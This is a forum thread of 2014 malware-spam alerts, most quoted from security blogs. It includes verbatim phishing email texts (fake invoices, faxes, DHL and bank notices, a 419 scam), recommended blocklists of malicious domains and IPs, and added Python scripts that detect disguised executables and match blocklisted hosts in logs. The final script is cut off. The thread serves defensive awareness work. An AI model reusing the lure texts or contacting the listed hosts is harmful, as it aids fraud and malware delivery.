Received on:1 5/09/2014 10:14 AM
Number of Pages: 1 ...
15 September 2014: Docs0972.zip ( 8kb): Extracts to: Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bec0ac2711f99f90f27a29a9e021bedfede02c139f26dcfae36e2d8895babf52/analysis/1410804563/
___
Twitch users shook by money spending malware
- http://www.theinquirer.net/inquirer/news/2367489/twitch-users-shook-by-money-spending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure.com/weblog/archives/00002742.html
:fear::fear: :mad:
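Two points recur through the posts above: archives whose member is an executable wearing a document name (2014.09.11.pdf.pif, IMG_00005_09112014.jpeg.pif, Documents.scr), with .pif never displayed by Explorer even when extensions are shown, and the advice to delete or block any ARJ attachment outright. The following added example is mine, not code from any of the quoted blogs, and shows how a mail-gateway or triage script can apply both rules: identify the container by its magic bytes rather than its name, walk the ZIP members looking for executable and double extensions, and check member content for a PE header so a renamed .exe is still caught. The sample archives are constructed in memory (the member names are borrowed from the posts, the contents are not the real malware), and the ARJ sample is only the two-byte header id, which is all the sniffer needs.

```python
import io
import zipfile
from typing import Dict, List

# Extensions Windows will execute even when the rest of the name looks like a document.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".lnk"}
# .pif and .lnk carry the NeverShowExt registry flag, so Explorer hides the suffix
# even when "Hide extensions for known file types" is switched off.
ALWAYS_HIDDEN_EXTS = {".pif", ".lnk"}
# Inner extensions used to make a double extension such as .pdf.pif look harmless.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".jpeg", ".png", ".txt"}

ARJ_MAGIC = b"\x60\xea"    # ARJ header id
ZIP_MAGIC = b"PK\x03\x04"  # ZIP local file header
PE_MAGIC = b"MZ"           # DOS stub of a Windows executable


def sniff_container(data: bytes) -> str:
    """Identify the archive type from its leading bytes, not from the filename."""
    if data.startswith(ARJ_MAGIC):
        return "arj"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def name_findings(member_name: str) -> List[str]:
    """Reasons a member filename is deceptive; an empty list means nothing odd."""
    findings = []
    base = member_name.rsplit("/", 1)[-1].lower()
    exts = ["." + part for part in base.split(".")[1:]]
    if not exts or exts[-1] not in EXECUTABLE_EXTS:
        return findings
    last = exts[-1]
    findings.append(f"executable extension {last}")
    if last in ALWAYS_HIDDEN_EXTS:
        findings.append(f"{last} is hidden by Explorer even with extensions shown")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS:
        findings.append(f"double extension {exts[-2]}{last}")
    return findings


def triage_attachment(filename: str, data: bytes) -> Dict:
    """Return container type, findings and an allow/block verdict for one attachment."""
    container = sniff_container(data)
    findings = []
    if container == "arj":
        # Follows the advice in the posts above: legitimate senders do not use ARJ.
        findings.append("ARJ archive")
    elif container == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                for reason in name_findings(info.filename):
                    findings.append(f"{info.filename}: {reason}")
                # Check content too: a renamed .exe is still an .exe.
                with zf.open(info) as member:
                    if member.read(2) == PE_MAGIC:
                        findings.append(f"{info.filename}: content is a PE executable")
    if filename.lower().endswith(".zip") and container != "zip":
        findings.append("name says .zip but content is not a ZIP")
    return {"container": container, "findings": findings,
            "verdict": "block" if findings else "allow"}


def build_zip(members: Dict[str, bytes]) -> bytes:
    """Helper to construct in-memory sample archives for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples, not the attachments from the posts above.
SAMPLE_PIF_ZIP = build_zip({"2014.09.11.pdf.pif": PE_MAGIC + b"\x90" * 62})
SAMPLE_CLEAN_ZIP = build_zip({"report.pdf": b"%PDF-1.4\n%% constructed sample\n"})
SAMPLE_ARJ = ARJ_MAGIC + b"\x00" * 30  # only the header id, enough for sniffing

if __name__ == "__main__":
    for name, blob in [("2014.09.11.zip", SAMPLE_PIF_ZIP),
                       ("report.zip", SAMPLE_CLEAN_ZIP),
                       ("invoice_8958508.arj", SAMPLE_ARJ)]:
        result = triage_attachment(name, blob)
        print(f"{name}: {result['verdict']} ({result['container']})")
        for finding in result["findings"]:
            print(f"  - {finding}")
```

The NeverShowExt behaviour can be confirmed on a Windows host by looking for that value under HKEY_CLASSES_ROOT\piffile (and lnkfile); it is why the "show known file extensions" advice in the posts is necessary but not sufficient for .pif. On a gateway, the PE-header check is the one that survives renaming, and the ARJ rule is cheap enough to apply unconditionally.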
AplusWebMaster
2014-09-16, 12:16
FYI...
Fake 'Payments' SPAM ...
- http://blog.mxlab.eu/2014/09/16/trojan-genvariant-graftor-155439-present-in-fake-emails-regarding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email, which comes with the subject “Re: today payment done”, is sent from a spoofed address and has the following body:
Dear sir,
Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
Cont. #42 EXSQI013/MAY/13 US$29,154.66
Total Remittance: US$ 51,704.97
Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
Thank you very much.
Best regards,
Me
The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/db9eb842deb7cbda56c3df7c1e198fac5f0d65d0d8ef9df2f13618d18416c686/analysis/
The second email, which comes with the subject “Re: Balance payment”, is sent from a spoofed address and has the following body:
The attached TT copy is issued at the request of our customer. The advice is for your reference only.
Yours faithfully,
Global Payments and Cash Management
Bank of America (BOA)
This is an auto-generated email, please DO NOT REPLY. Any replies to this
email will be disregarded...
The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/f7f1b10365b995c308d1cc4a3f025e5e7f249fbfee82f7bcd8297e1c5fcc1635/analysis/
___
Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu/2014/09/16/email-my-new-photo-contains-a-variant-of-trojan-win32-swizzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
my new photo ;)
if you like my photo to send me u photo
The attached ZIP file has the name photo.zip; once extracted, a folder named photo is available that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/83d322707828350ba51301b1a0d02ee0c831b88bb9722036ade2b7d8827817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustotal.com/en/ip-address/131.253.40.1/information/
137.254.60.32: https://www.virustotal.com/en/ip-address/137.254.60.32/information/
134.170.188.84: https://www.virustotal.com/en/ip-address/134.170.188.84/information/
157.56.121.21: https://www.virustotal.com/en/ip-address/157.56.121.21/information/
91.240.22.62: https://www.virustotal.com/en/ip-address/91.240.22.62/information/
___
Fake USPS SPAM - word doc malware
- http://myonlinesecurity.co.uk/usps-postal-notification-service-fake-word-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/usps-postal-notification-service.png
16 September 2014: Label.zip ( 82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6678ff966e942e4bf669d8a240acbab79971c871152f3c16478a3ec0c3f5c805/analysis/1410841682/
___
Fake 'inovice' SPAM ...
- http://blog.dynamoo.com/2014/09/inovice-0293991-september-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment
The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series of DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustotal.com/en-gb/file/ee43410ecaba583a03eb3cfbf1af1afb38a5f25cd8742b47372b853d83fc7089/analysis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustotal.com/en/ip-address/208.91.197.27/information/
___
Fake FAX SPAM... again
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From: Fax
Date: 16 September 2014 11:05
Subject: You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...
The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps "
* https://www.virustotal.com/en-gb/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo.com/2014/09/kifilwe-shakong-copied-invoices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From: Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date: 16 September 2014 12:17
Subject: Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...
Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/e324d73b36f1fd31c53f6ae21457c2fd57f90be56dcd776efbe06b01fdaf3d5d/analysis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo.com/2014/09/unpaid-invoice-notification-spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
From: Christie Foley [christie.foley@ badinsky .sk]
Reply-to: Christie Foley [christie.foley@ badinsky .sk]
Date: 16 September 2014 13:55
Subject: Unpaid invoice notification ...
Screenshot: https://1.bp.blogspot.com/-4dVURai9zaE/VBg551t4f-I/AAAAAAAAFoA/l2blM5UgsbU/s1600/invoice.png
The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/report.php?id=1410873578924
- http://myonlinesecurity.co.uk/notification-amount-overdue-recent-invoice-java-exploit-malware/
16 Sep 2014
___
Fake 'PAYMENT SCHEDULE' email - 419 SCAM
- http://myonlinesecurity.co.uk/reyour-payment-schedule-pretending-come-dr-mrs-ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
Attn:Beneficiary,
My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
Teller Machine System( ATM CARD).
Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
Reply also to : fminister88 @gmail .com
Your faithfully.
Dr Mrs Ngozi O. Iweala.
Finance Of Minister.
[Arrgghh...]
___
Fake Nat West SPAM - PDF malware
- http://myonlinesecurity.co.uk/nat-west-bacs-transfer-remittance-jsag828gbp-fake-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 4933.00
Please find details at our secure link below: ...
This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/natwest-new-secure-message-file-4430-fake-pdf-malware/
- https://www.virustotal.com/en/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu/2014/09/16/fake-email-fwd-dhl-delivery-attempt-contains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
Airway Bill No: 7808130095
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Print this label to get this package at our depot/office.
Thank you
© 2014 Copyright© 2013 DHL. All Rights Reserved...
The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/57d37614dd81d48c25bec02f4481e1757cd7a5b84ccc31904635a51d70db1a44/analysis/1410870424/
:fear::fear: :mad:
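The dynamoo posts quoted above end with a "Recommended blocklist" written in defanged form (a space before each dot), which is how the indicators should stay in a forum post but not how a resolver or proxy log will show them. The following is an added example, not code from the thread or from the blogs it quotes: a Python helper that refangs those indicators, builds a matcher that understands IP addresses and parent domains, and runs it over a batch of log lines. The blocklist entries are the ones quoted in the posts above; the log format and the log lines themselves are constructed for the demonstration (the 10.0.0.x clients, mail.example.com and 198.51.100.20 are placeholders).

```python
"""Refang a quoted 'Recommended blocklist' and match it against log lines.

Added example for this thread; the indicator strings come from the dynamoo
posts quoted above, the log lines and their format are constructed here.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

_SCHEME_RE = re.compile(r"^[a-z]+://", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Normalise a defanged indicator ('triera .biz.ua', 'http ://x .y/path',
    '1.2.3[.]4') to a bare lower-case host name or IP address."""
    s = indicator.strip().strip('"').replace("[.]", ".").replace("(.)", ".")
    s = re.sub(r"\s*\.\s*", ".", s)                 # 'triera .biz.ua' -> 'triera.biz.ua'
    s = re.sub(r"\s*://\s*", "://", s)              # 'http ://x' -> 'http://x'
    s = _SCHEME_RE.sub("", s)                       # drop http://, hxxp://, ...
    s = re.split(r"[/:?#\s]", s, maxsplit=1)[0]     # drop path, port, query string
    return s.lower().rstrip(".")


class Blocklist:
    """Indicators split into IP networks and domain names."""

    def __init__(self, indicators):
        self.networks = []
        self.domains = set()
        for raw in indicators:
            host = refang(raw)
            if not host:
                continue
            try:
                self.networks.append(ipaddress.ip_network(host, strict=False))
            except ValueError:          # not an IP or CIDR, so treat it as a domain
                self.domains.add(host)

    def match(self, host: str) -> Optional[str]:
        """Return the blocklist entry covering host, or None.
        Domains match themselves and any subdomain; IPs match by network."""
        host = host.lower().rstrip(".")
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            labels = host.split(".")
            # Walk from the full name up to its two-label parent.
            for i in range(len(labels) - 1):
                candidate = ".".join(labels[i:])
                if candidate in self.domains:
                    return candidate
            return None
        for net in self.networks:
            if addr in net:
                return str(net)
        return None


# Constructed log format: '<date> <time> client=<ip> (query|dst)=<name-or-ip>'
_LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) client=(?P<client>\S+) (?:query|dst)=(?P<host>\S+)$")

Hit = Tuple[str, str, str, str]   # (timestamp, client, host seen, matching entry)


def scan_log(lines, blocklist: Blocklist) -> List[Hit]:
    """Return one hit per parseable line whose query name or destination is listed."""
    hits: List[Hit] = []
    for line in lines:
        m = _LOG_RE.match(line.strip())
        if not m:
            continue                      # unparseable line: skip it, keep going
        entry = blocklist.match(m["host"])
        if entry:
            hits.append((m["ts"], m["client"], m["host"], entry))
    return hits


# Indicators as they appear (defanged) in the dynamoo posts quoted in this thread.
RECOMMENDED_BLOCKLIST = ["188.165.204.210", "denis-benker .de", "estudiocarraro .com.br", "triera .biz.ua"]

# Constructed sample log; clients and the unlisted names/addresses are placeholders.
SAMPLE_LOG = [
    "2014-09-17 09:40:01 client=10.0.0.5 query=www.estudiocarraro.com.br",
    "2014-09-17 09:40:02 client=10.0.0.5 query=mail.example.com",
    "2014-09-17 09:40:09 client=10.0.0.5 dst=188.165.204.210",
    "2014-09-17 09:41:00 client=10.0.0.7 query=denis-benker.de.",   # FQDN form, trailing dot
    "2014-09-17 09:41:30 client=10.0.0.9 dst=198.51.100.20",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ts, client, host, entry in scan_log(SAMPLE_LOG, Blocklist(RECOMMENDED_BLOCKLIST)):
        print(f"{ts} {client} -> {host} (blocklisted: {entry})")
```

Domain matching walks up the label chain, so a sighting of www.estudiocarraro.com.br is caught by the bare estudiocarraro.com.br entry; IP entries are stored as /32 networks so a CIDR can be dropped into the same list later without changing the matcher.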
AplusWebMaster
2014-09-17, 13:20
FYI...
Fake FAX SPAM - malware
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-no-you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
From: Fax [fax@ victimdomain .com]
Date: 17 September 2014 09:32
Subject: You've received a new fax
New fax at SCAN6405035 from EPSON by https ://victimdomain .com
Scan date: Wed, 17 Sep 2014 16:32:29 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)
The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br"
* https://www.virustotal.com/en-gb/file/01e69a84cd47f38786affe7348fb334f2092984fa11444352ee5a0431c505f6d/analysis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
___
Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/adp-invoice-with-malicious-pdf.png
17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2653224f479aa10f4e82b489987bb519f563786b676bacb76a5efba2963cd546/analysis/1410974477/
___
Android Malware uses SSL for Evasion
- http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-use-ssl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combines the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources.
Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___
Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/ukfast-invoice.png
17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/200ef318f11db4e3975159b378a48bf2d6420c3a48d7f4c75efe1cb2acbc22b8/analysis/1410939664/
___
Fake Invoice SPAM ...
- http://myonlinesecurity.co.uk/strabane-weekly-news-inv0071981-newspaper-copy-fake-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... - same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
Dear Sir,
Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
Thank you,
Darragh
This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
:fear: :mad:
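Nearly every report in this post ends with the same point: the attachment is an .exe or .scr wearing a PDF icon and a document-like name, and with "show known file extensions" off it looks like a PDF. The icon and the name are both under the sender's control; the leading bytes of the file are not. The following is an added example, not code from the thread or from the blogs it quotes: a Python checker that unpacks a ZIP attachment in memory and flags any member whose content is a Windows PE image, or whose .pdf extension is not backed by a real PDF header. The member names and bytes in build_sample_zip() are constructed for the demonstration, and DOCUMENT_TOKENS is an assumed list of name fragments, not something the posts specify.

```python
"""Judge an attachment by its content, not its icon or extension.

Added example for this thread, not code from the blogs it quotes. The sample
archive built below is constructed; DOCUMENT_TOKENS is an assumed list.
"""
import io
import zipfile
from dataclasses import dataclass
from typing import List

# Real format signatures, compared against the first bytes of a file.
MAGIC = (
    (b"%PDF-", "pdf"),
    (b"MZ", "pe"),                                  # Windows PE image (.exe/.scr/.dll)
    (b"PK\x03\x04", "zip"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),   # legacy .doc/.xls container
)
# Extensions Windows runs on double-click and Explorer hides by default.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Assumed name fragments used so the visible part of the name reads as a document.
DOCUMENT_TOKENS = ("pdf", "doc", "invoice", "fax", "label", "document")


def sniff(data: bytes) -> str:
    """Content type implied by the leading bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extension(name: str) -> str:
    """Lower-cased final extension including the dot ('' if none)."""
    base = name.rsplit("/", 1)[-1].lower()
    return base[base.rfind("."):] if "." in base else ""


@dataclass
class Verdict:
    name: str
    claimed: str       # what the extension says
    actual: str        # what the bytes say
    suspicious: bool
    reason: str


def assess_file(name: str, data: bytes) -> Verdict:
    """Flag executables of any name, and document extensions hiding other content."""
    ext = extension(name)
    actual = sniff(data)
    stem = name.lower()[: -len(ext)] if ext else name.lower()
    if actual == "pe":
        if ext in EXECUTABLE_EXTS and any(tok in stem for tok in DOCUMENT_TOKENS):
            return Verdict(name, ext, actual, True, "executable with a document-lookalike name")
        if ext not in EXECUTABLE_EXTS:
            return Verdict(name, ext, actual, True, f"executable content behind a '{ext or 'missing'}' extension")
        return Verdict(name, ext, actual, True, "executable attachment")
    if ext == ".pdf" and actual != "pdf":
        return Verdict(name, ext, actual, True, f"claims PDF but content is {actual}")
    return Verdict(name, ext, actual, False, "content consistent with name")


def assess_attachment(name: str, data: bytes) -> List[Verdict]:
    """Unpack a ZIP in memory and assess each member; otherwise assess the file itself."""
    if sniff(data) != "zip":
        return [assess_file(name, data)]
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [assess_file(info.filename, zf.read(info))
                    for info in zf.infolist() if not info.is_dir()]
    except zipfile.BadZipFile:
        return [Verdict(name, extension(name), "zip", True, "archive that cannot be read")]


def build_sample_zip() -> bytes:
    """Constructed sample: a disguised executable, a real PDF, and a PE named .pdf."""
    fake_pe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 100   # header stub only, not a program
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_0001_pdf.exe", fake_pe)
        zf.writestr("cover.pdf", b"%PDF-1.4\n%constructed, not a real document\n")
        zf.writestr("Report.pdf", fake_pe)
    return buf.getvalue()


if __name__ == "__main__":
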